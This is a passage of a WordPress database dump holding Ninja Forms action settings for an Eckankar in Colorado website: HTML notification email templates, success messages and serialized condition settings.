/>\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1599,62,'attach_csv','0','attach_csv','0'),(1600,62,'email_format','html','email_format','html'),(1601,62,'reply_to','','reply_to',''),(1602,62,'cc','','cc',''),(1603,62,'bcc','','bcc',''),(1604,62,'redirect_url','','redirect_url',''),(1605,62,'success_msg','','success_msg',''),(1606,62,'label','Send copy to user','label','Send copy to user'),(1607,62,'objectType','Action','objectType','Action'),(1608,62,'objectDomain','actions','objectDomain','actions'),(1609,62,'editActive','','editActive',''),(1610,62,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1611,62,'payment_gateways','','payment_gateways',''),(1612,62,'payment_total','0','payment_total','0'),(1613,62,'tag','','tag',''),(1614,62,'email_message_plain','','email_message_plain',''),(1615,62,'parent_id','16','parent_id','16'),(1616,63,'title','','title',''),(1617,63,'key','','key',''),(1618,63,'type','successmessage','type','successmessage'),(1619,63,'active','1','active','1'),(1620,63,'created_at','2018-01-03 11:43:02','created_at','2018-01-03 11:43:02'),(1621,63,'date_updated','2016-01-15','date_updated','2016-01-15'),(1622,63,'from_name','','from_name',''),(1623,63,'from_address','','from_address',''),(1624,63,'to','{wp:admin_email}','to','{wp:admin_email}'),(1625,63,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1626,63,'email_message','{fields_table}','email_message','{fields_table}'),(1627,63,'attach_csv','0','attach_csv','0'),(1628,63,'email_format','html','email_format','html'),(1629,63,'reply_to','','reply_to',''),(1630,63,'cc','','cc',''),(1631,63,'bcc','','bcc',''),(1632,63,'redirect_url','','redirect_url',''),(1633,63,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(1634,63,'label','Success Message','label','Success Message'),(1635,63,'objectType','Action','objectType','Action'),(1636,63,'objectDomain','actions','objectDomain','actions'),(1637,63,'editActive','','editActive',''),(1638,63,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1639,63,'payment_gateways','','payment_gateways',''),(1640,63,'payment_total','0','payment_total','0'),(1641,63,'tag','','tag',''),(1642,63,'email_message_plain','','email_message_plain',''),(1643,63,'parent_id','16','parent_id','16'),(1644,64,'title','','title',''),(1645,64,'key','','key',''),(1646,64,'type','email','type','email'),(1647,64,'active','1','active','1'),(1648,64,'created_at','2018-01-03 11:43:02','created_at','2018-01-03 11:43:02'),(1649,64,'date_updated','2016-01-19','date_updated','2016-01-19'),(1650,64,'from_name','Loveland Leadership Communications','from_name','Loveland Leadership Communications'),(1651,64,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1652,64,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(1653,64,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(1654,64,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Loveland Leadership Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Loveland Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_45}Â {field:lastname_46}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_45}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_46}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_47}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_48}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_49}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_52}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_53}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello!</strong><strong> You have a new <span style=\"color: #23507d\">Loveland Leadership Communications</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Loveland Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_45}Â {field:lastname_46}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_45}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_46}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_47}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_48}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_49}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_52}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_53}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1655,64,'attach_csv','0','attach_csv','0'),(1656,64,'email_format','html','email_format','html'),(1657,64,'reply_to','','reply_to',''),(1658,64,'cc','','cc',''),(1659,64,'bcc','','bcc',''),(1660,64,'redirect_url','','redirect_url',''),(1661,64,'success_msg','','success_msg',''),(1662,64,'label','Admin Email','label','Admin Email'),(1663,64,'objectType','Action','objectType','Action'),(1664,64,'objectDomain','actions','objectDomain','actions'),(1665,64,'editActive','','editActive',''),(1666,64,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1667,64,'payment_gateways','','payment_gateways',''),(1668,64,'payment_total','0','payment_total','0'),(1669,64,'tag','','tag',''),(1670,64,'email_message_plain','','email_message_plain',''),(1671,64,'drawerDisabled','','drawerDisabled',''),(1672,64,'parent_id','16','parent_id','16'),(1673,65,'title','','title',''),(1674,65,'key','','key',''),(1675,65,'type','save','type','save'),(1676,65,'active','1','active','1'),(1677,65,'created_at','2019-02-13 13:44:28','created_at','2019-02-13 13:44:28'),(1678,65,'drawerDisabled','','drawerDisabled',''),(1679,65,'subs_expire_time','90','subs_expire_time','90'),(1680,65,'set_subs_to_expire','0','set_subs_to_expire','0'),(1681,65,'exception_fields','a:0:{}','exception_fields','a:0:{}'),(1682,65,'fields-save-toggle','save_all','fields-save-toggle','save_all'),(1683,65,'objectType','Action','objectType','Action'),(1684,65,'objectDomain','actions','objectDomain','actions'),(1685,65,'editActive','','editActive',''),(1686,65,'label','Store Submission','label','Store Submission'),(1687,65,'order','3','order','3'),(1688,65,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1689,65,'message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(1690,65,'payment_gateways','','payment_gateways',''),(1691,65,'payment_total','0','payment_total','0'),(1692,65,'tag','','tag',''),(1693,65,'to','{wp:admin_email}','to','{wp:admin_email}'),(1694,65,'reply_to','','reply_to',''),(1695,65,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1696,65,'email_message','{fields_table}','email_message','{fields_table}'),(1697,65,'email_message_plain','','email_message_plain',''),(1698,65,'from_name','','from_name',''),(1699,65,'from_address','','from_address',''),(1700,65,'email_format','html','email_format','html'),(1701,65,'cc','','cc',''),(1702,65,'bcc','','bcc',''),(1703,65,'redirect_url','','redirect_url',''),(1704,65,'submitter_email','email_1550094081455','submitter_email','email_1550094081455'),(1705,65,'parent_id','17','parent_id','17'),(1706,66,'title','','title',''),(1707,66,'key','','key',''),(1708,66,'type','email','type','email'),(1709,66,'active','1','active','1'),(1710,66,'created_at','2019-02-13 13:44:28','created_at','2019-02-13 13:44:28'),(1711,66,'drawerDisabled','','drawerDisabled',''),(1712,66,'objectType','Action','objectType','Action'),(1713,66,'objectDomain','actions','objectDomain','actions'),(1714,66,'editActive','','editActive',''),(1715,66,'label','Admin Email','label','Admin Email'),(1716,66,'order','2','order','2'),(1717,66,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1718,66,'message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.','message','This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.'),(1719,66,'payment_gateways','','payment_gateways',''),(1720,66,'payment_total','0','payment_total','0'),(1721,66,'tag','','tag',''),(1722,66,'to','co.eck.dba@eckankar-colorado.org','to','co.eck.dba@eckankar-colorado.org'),(1723,66,'reply_to','','reply_to',''),(1724,66,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(1725,66,'email_message','<table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb; padding-left: 10px; color: #23507d; line-height: 80%;\" valign=\"top\" align=\"left<br ></td>                                \"><h2><span style=\"color: #23507d;\">Eckankar In Colorado - Member Newsletter Subscription<br></span></h2></td><td> </td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><p><strong>Hello! You have a new \"Eckankar in Colorado <span style=\"color: #23507d;\"><u>MEMBER</u></span> Newsletter\" form submission.<br></strong><br>This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this email because you are listed as the contact to receive these new Newsletter subscription requests.</p><p>The following person has requested a <b>MEMBER</b> subscription. </p></td></tr></tbody></table><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb; padding: 10px; border: 1px solid #cccccc;\" valign=\"top\" align=\"left<br ></td>                                \"><p><span style=\"color: #333333;\"><strong>FIRST NAME:</strong> </span>{field:firstname_1550094074971}<span style=\"color: #333333;\"><br></span><span style=\"color: #333333;\"><strong>LAST NAME:</strong> </span>{field:lastname_1550094079880}<span style=\"color: #333333;\"><br></span><span style=\"color: #333333;\"><strong>EMAIL:</strong> </span>{field:email_1550094081455}<span style=\"color: #333333;\"><br><strong>STATE</strong></span><span style=\"color: #333333;\"><strong>:</strong> </span>{field:liststate_1550094094681}<span style=\"color: #333333;\"><br></span><span style=\"color: #333333;\"><strong>COUNTRY</strong></span><span style=\"color: #333333;\"><strong>:</strong> </span>{field:listcountry_1550094096365}<span style=\"color: #333333;\"><br><strong>SUBSCRIPTION(S):</strong> </span>{field:choose_your_subscription_s_1550099095640}<span style=\"color: #333333;\"><strong><br></strong></span></p></td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<p style=\"color: #23507d;\"><em>Your Eckankar in Colorado Team<br><a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><p> </p>','email_message','<table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"center\"><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb; padding-left: 10px; color: #23507d; line-height: 80%;\" valign=\"top\" align=\"left<br ></td>                                \"><h2><span style=\"color: #23507d;\">Eckankar In Colorado - Member Newsletter Subscription<br></span></h2></td><td> </td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\"><p><strong>Hello! You have a new \"Eckankar in Colorado <span style=\"color: #23507d;\"><u>MEMBER</u></span> Newsletter\" form submission.<br></strong><br>This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this email because you are listed as the contact to receive these new Newsletter subscription requests.</p><p>The following person has requested a <b>MEMBER</b> subscription. </p></td></tr></tbody></table><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb; padding: 10px; border: 1px solid #cccccc;\" valign=\"top\" align=\"left<br ></td>                                \"><p><span style=\"color: #333333;\"><strong>FIRST NAME:</strong> </span>{field:firstname_1550094074971}<span style=\"color: #333333;\"><br></span><span style=\"color: #333333;\"><strong>LAST NAME:</strong> </span>{field:lastname_1550094079880}<span style=\"color: #333333;\"><br></span><span style=\"color: #333333;\"><strong>EMAIL:</strong> </span>{field:email_1550094081455}<span style=\"color: #333333;\"><br><strong>STATE</strong></span><span style=\"color: #333333;\"><strong>:</strong> </span>{field:liststate_1550094094681}<span style=\"color: #333333;\"><br></span><span style=\"color: #333333;\"><strong>COUNTRY</strong></span><span style=\"color: #333333;\"><strong>:</strong> </span>{field:listcountry_1550094096365}<span style=\"color: #333333;\"><br><strong>SUBSCRIPTION(S):</strong> </span>{field:choose_your_subscription_s_1550099095640}<span style=\"color: #333333;\"><strong><br></strong></span></p></td></tr></tbody></table></td></tr><tr><td valign=\"top\" align=\"center\"><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<p style=\"color: #23507d;\"><em>Your Eckankar in Colorado Team<br><a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table><p> </p>'),(1726,66,'email_message_plain','','email_message_plain',''),(1727,66,'from_name','','from_name',''),(1728,66,'from_address','','from_address',''),(1729,66,'email_format','html','email_format','html'),(1730,66,'cc','','cc',''),(1731,66,'bcc','','bcc',''),(1732,66,'parent_id','17','parent_id','17'),(1733,67,'title','','title',''),(1734,67,'key','','key',''),(1735,67,'type','successmessage','type','successmessage'),(1736,67,'active','1','active','1'),(1737,67,'created_at','2019-02-13 13:44:28','created_at','2019-02-13 13:44:28'),(1738,67,'drawerDisabled','','drawerDisabled',''),(1739,67,'payment_gateways','','payment_gateways',''),(1740,67,'payment_total','0','payment_total','0'),(1741,67,'tag','','tag',''),(1742,67,'to','{wp:admin_email}','to','{wp:admin_email}'),(1743,67,'reply_to','','reply_to',''),(1744,67,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms 